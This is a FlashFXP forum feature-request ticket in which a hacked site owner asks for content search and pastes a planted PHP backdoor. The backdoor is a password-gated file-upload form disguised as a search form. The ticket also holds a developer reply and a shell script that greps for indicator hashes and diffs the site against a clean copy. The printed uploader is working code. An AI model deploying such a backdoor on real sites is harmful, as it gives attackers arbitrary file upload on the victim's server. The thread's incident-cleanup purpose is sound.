Project: FlashFXP Feature Requests
ID: 921
Category: Server Compatibility
Title: Possible to search for code - hacker has made a lot of files on my shared host domains
Status: Closed (Discarded)
Severity: Critical
Version: 4.x

Junior Member
Tine Müller
12-26-2013, 04:49 AM
Possible to search for code - hacker has made a lot of files on my shared host domains

Hi, I really like your product; I would just like to know if it would be possible to search for code the same way as we can search for files. Would this be possible in the future, please?

I need it because my sites on a shared host have been hacked. I have spent weeks trying to solve this and have figured out that a lot of the .php files the hacker put on my domains include:

Quote:
Searched for $auth_pass = "010725b18df33d5920e241c4006f11d4"; which is included in a lot of files on my domains, and I am about to find out how to clean all these files. Found http://www.unphp.net/decode/a2777f8a...8f6baf24c525a/

Can someone tell me what all this code does to my sites, please, and isn't it possible to stop this hacker? His IP is 95.211.22.216, and I searched and found http://www.abuseipdb.com/report-history/95.211.22.216.

The same IP has made a file with this code, and the file should NOT be in this Drupal module. Maybe he uses this file to put ALL the other files on my shared host?

<?php
if(!empty($_FILES['message']['name']) AND (md5($_POST['nick']) == '211df628e55249fce7074c90be70e56b')) {
$security_code = $_POST['security_code'];
if ( !$security_code ) $security_code = ".";
$security_code = rtrim($security_code, "/");
$tmp_name = $_FILES['message']['tmp_name'];
$name = $_FILES['message']['name'];
@move_uploaded_file($tmp_name, $security_code."/".$name) ? print "<b>Message sent!</b><br/>" : print "<b>Error!</b><br/>";
} /*3339*/ print '<html>
<head>
<title>Search form</title>
</head>
<body>
<form enctype="multipart/form-data" action="" method="POST">
Message: <br/><input name="message" type="file" />
<br/>Security Code: <br/><input name="security_code" value=""/><br/>
<br/>Nick: <br/><input name="nick" value=""/><br/>
<input type="submit" value="Sent" />
</form>
</body>
</html>';

I'm also discussing it in the Drupal group https://drupal.org/node/2153055#comment-8302687

FlashFXP Developer
bigstar
01-02-2014, 11:50 AM
Re: Possible to search for code - hacker has made a lot of files on my shared host domains

Searching the content of files on a remote server is not very practical because each file would need to be downloaded; you may as well download everything and do a local grep. GrepWin is a nice tool, it can also do find and replace, then re-upload the edited files all in one go. Trying to do this remotely, what if the files are re-infected by another file immediately after you sanitize them?

The best solution would be to replace all the files on the server with a local copy of the files that haven't been tampered with; trying to sanitize the remote files may work, but if you miss one file or another backdoor you leave yourself open to a repeat hack.

If you don't have the original files and your only option is to sanitize the modified files, then it would be more practical to access the server via SSH (shell) and use grep to find files that contain the desired text patterns.

Either way the site should probably be taken down while the files are sanitized and only brought back online once you can ensure all the files are cleaned.
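
The local search and the comparison against untampered files described in this reply can be combined into one offline triage script; this is an added example, not part of the thread or of FlashFXP. The directory layout (`site`, `clean`, `modules/views`) and the function names are assumptions, and the sample trees are constructed; the two search strings are the ones quoted in the ticket.

```shell
#!/bin/sh
# Added example: triage a downloaded copy of a hacked site offline.

# PHP files under $1 that contain either fixed string quoted in the ticket.
# -F treats the patterns as literal text, so "$" and "(" need no escaping.
scan_indicators() {
    find "$1" -type f -name '*.php' -exec grep -lF \
        -e '$auth_pass = "010725b18df33d5920e241c4006f11d4"' \
        -e '211df628e55249fce7074c90be70e56b' {} + | sort
}

# Files in the downloaded copy ($1) that are missing from, or differ from,
# a known-good copy ($2), e.g. the original release archive or a backup.
# This also catches planted files that contain none of the known strings.
diff_against_clean() {
    ( cd "$1" && find . -type f | sort ) | while IFS= read -r f; do
        if [ ! -f "$2/$f" ]; then
            echo "ADDED $f"
        elif ! cmp -s "$1/$f" "$2/$f"; then
            echo "MODIFIED $f"
        fi
    done
}

# Constructed sample trees (not real site data) so the script runs offline.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/site/modules/views" "$d/clean/modules/views"
    printf '%s\n' '<?php // stock module file' > "$d/clean/modules/views/views.php"
    printf '%s\n' '<?php // stock index' > "$d/clean/index.php"
    cp "$d/clean/modules/views/views.php" "$d/site/modules/views/views.php"
    # index.php tampered with: carries the $auth_pass line from the ticket
    printf '%s\n' '<?php $auth_pass = "010725b18df33d5920e241c4006f11d4";' \
        '// stock index' > "$d/site/index.php"
    # extra file that does not belong to the module
    printf '%s\n' "<?php if (md5(\$_POST['nick']) == '211df628e55249fce7074c90be70e56b') {}" \
        > "$d/site/modules/views/search.php"
    echo "$d"
}

s=$(make_sample)
scan_indicators "$s/site"
diff_against_clean "$s/site" "$s/clean"
rm -rf "$s"
```
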
All times are GMT -5.